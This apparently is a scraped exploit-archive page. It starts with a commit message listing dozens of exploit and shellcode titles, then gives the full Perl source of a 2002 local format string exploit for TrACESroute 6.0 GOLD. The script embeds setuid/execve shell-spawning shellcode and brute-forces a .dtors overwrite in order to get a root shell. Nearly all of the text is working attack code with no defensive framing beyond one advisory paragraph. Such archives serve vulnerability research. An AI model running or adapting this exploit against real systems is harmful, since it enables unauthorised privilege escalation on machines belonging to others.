880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
99 lines
No EOL
3.3 KiB
Perl
Executable file
99 lines
No EOL
3.3 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/4956/info
|
|
|
|
A format string vulnerability exists in TrACESroute. The problem exists in the terminator (-T) function of the program. Due to improper use of the fprintf function, an attacker may be able to supply a malicious format string to the program that reults in writing of attacker-supplied values to arbitrary locations in memory.
|
|
|
|
#!/usr/bin/perl
|
|
|
|
## ---/ tracesex.pl /---------------------------------------------------
|
|
##
|
|
## TrACESroute 6.0 GOLD local format string exploit
|
|
## * tested on Red Hat Linux release 7.2 (Enigma)
|
|
## * Jun 12 2002
|
|
##
|
|
## Author: stringz // thc@drug.org
|
|
## Vulnerability discovered by: downbload // downbload@hotmail.com
|
|
##
|
|
## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com
|
|
##
|
|
## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,
|
|
## obscure, jove, rachel, kevin, and all of my 2e2h friends.
|
|
##
|
|
## ---/ powered by pot /-----------------------------------------------
|
|
|
|
# setuid + execve shellcode
|
|
$kode =
|
|
"\x31\xdb". # xor ebx, ebx
|
|
"\xf7\xe3". # mul ebx
|
|
"\xb0\x17". # mov al, 0x17
|
|
"\xcd\x80". # int 0x80
|
|
"\x31\xc0". # xor eax, eax
|
|
"\x99". # cdq
|
|
"\x52". # push edx
|
|
"\x68\x2f\x2f\x73\x68". # push dword 0x68732f2f
|
|
"\x68\x2f\x62\x69\x6e". # push dword 0x6e69622f
|
|
"\x89\xe3". # mov ebx, esp
|
|
"\x52". # push edx
|
|
"\x53". # push ebx
|
|
"\x89\xe1". # mov ecx, esp
|
|
"\xb0\x0b". # mov al, 0x0b
|
|
"\xcd\x80"; # int 0x80
|
|
|
|
$vuln = "./tr"; # CHANGE THIS!@#$%!
|
|
$dtors = 0x804e48c + 4;;
|
|
|
|
printf("\n-- TrACESroute 6.0 GOLD local format string exploit\n");
|
|
printf("-- Author: stringz // thc\@drug.org\n\n");
|
|
printf("-- Vulnerability discovered by: downbload // downbload\@hotmail.com\n");
|
|
|
|
$ret_addr = 0xc0000000 - 4
|
|
- (length($vuln) + 1)
|
|
- (length($kode) + 1)
|
|
;
|
|
|
|
undef(%ENV); $ENV{'1337'} = $kode;
|
|
|
|
printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
|
|
printf("bruteforcing distance (1 .. 300)\n");
|
|
sleep(2);
|
|
|
|
for (1 .. 300) {
|
|
$fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
|
|
die("\x0a") if (system("$vuln -T $fmt_str localhost"))
|
|
=~ m/^(0|256|512|32512)$/; # may need a tweak ;)
|
|
}
|
|
|
|
sub
|
|
sw_fmtstr_create ($$$)
|
|
{
|
|
die("Incorrect number of arguments for sw_fmtstr_create")
|
|
unless @_ == 3;
|
|
|
|
my ($dest_addr, $ret_addr, $dist) = @_;
|
|
my ($word, $qword) = (2, 8);
|
|
|
|
# $dest_addr = where to write $ret_addr
|
|
# $ret_addr = where to return execution
|
|
# $dist = the calculated distance
|
|
|
|
$tmp1 = (($ret_addr >> 16) & 0xffff);
|
|
$tmp2 = $ret_addr & 0xffff;
|
|
|
|
if ($tmp1 < $tmp2) {
|
|
$high = $tmp1 - $qword;
|
|
$low = $tmp2 - $high - $qword;
|
|
|
|
$dest_addr1 = pack('L', $dest_addr + $word);
|
|
$dest_addr2 = pack('L', $dest_addr);
|
|
}
|
|
else {
|
|
$high = $tmp2 - $qword;
|
|
$low = $tmp1 - $high - $qword;
|
|
|
|
$dest_addr1 = pack('L', $dest_addr);
|
|
$dest_addr2 = pack('L', $dest_addr + $word);
|
|
}
|
|
|
|
sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
|
|
$dest_addr1, $dest_addr2, $high, $dist,
|
|
$low, $dist + 1);
|
|
} |